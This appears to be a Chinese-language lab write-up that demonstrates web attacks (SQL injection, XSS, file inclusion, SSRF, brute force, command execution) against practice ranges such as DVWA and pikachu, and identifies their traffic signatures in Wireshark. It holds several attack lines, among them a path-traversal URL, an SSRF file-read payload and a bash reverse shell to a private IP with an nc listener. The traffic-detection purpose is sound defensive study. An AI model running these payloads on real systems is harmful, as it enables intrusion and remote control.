演示如下漏洞的攻击过程,攻击过程中使用wireshark抓取攻击流量,定位关键字段,要求过程截图描述,演示完回答如何判断该漏洞的流量特征.
1.sql注入
环境:sqli靶场
查看关键字:union、select、等sql语句
查看数据流
![](https://i-blog.csdnimg.cn/blog_migrate/57471cc7ee77b83ddfbf848e535e2902.png)
2.xss
关键字:<script>、alert、等HTML代码
查看数据流
![](https://i-blog.csdnimg.cn/blog_migrate/d7d87f5b5aac69388974ecc5f753299e.png)
3.文件上传
环境:dvwn靶场
关键字:一句话木马
查看数据流
![](https://i-blog.csdnimg.cn/blog_migrate/9bec97e37d4139a4e66f92765f53bf75.png)
4.文件包含
环境:dvwn靶场
http://10.9.47.3/dvwa_2.0.1/vulnerabilities/fi/?page=../../phpinfo.php
查看数据流
![](https://i-blog.csdnimg.cn/blog_migrate/d40e43c5b0f4783d2ba15bff3eeeac3f.png)
5.文件读取
环境:metinfo_6.0.0网站
查看数据流
6.ssrf
环境:pikachu靶场
?url=file:///c:/windows/system32/drivers/etc/hosts
查看数据流
7.shiro反序列化
8.jwt
9.暴力破解
环境:dvwn靶场
爆破
查看数据流
![](https://i-blog.csdnimg.cn/blog_migrate/397452d80c13dec122d798294bf0d7dc.png)
10.命令执行
环境:dvwn靶场
关键字:cmd命令。如:whoami。
查看数据流
![](https://i-blog.csdnimg.cn/blog_migrate/afceaee3be1bf798a904f79f94c1206f.png)
11.反弹shell
环境:一台Linux系统机器,一台kali.
kali开启nc
nc -lvvp 4444
bash -c 'bash -i >& /dev/tcp/192.168.221.128/4444 0>&1'
执行命令
查看数据流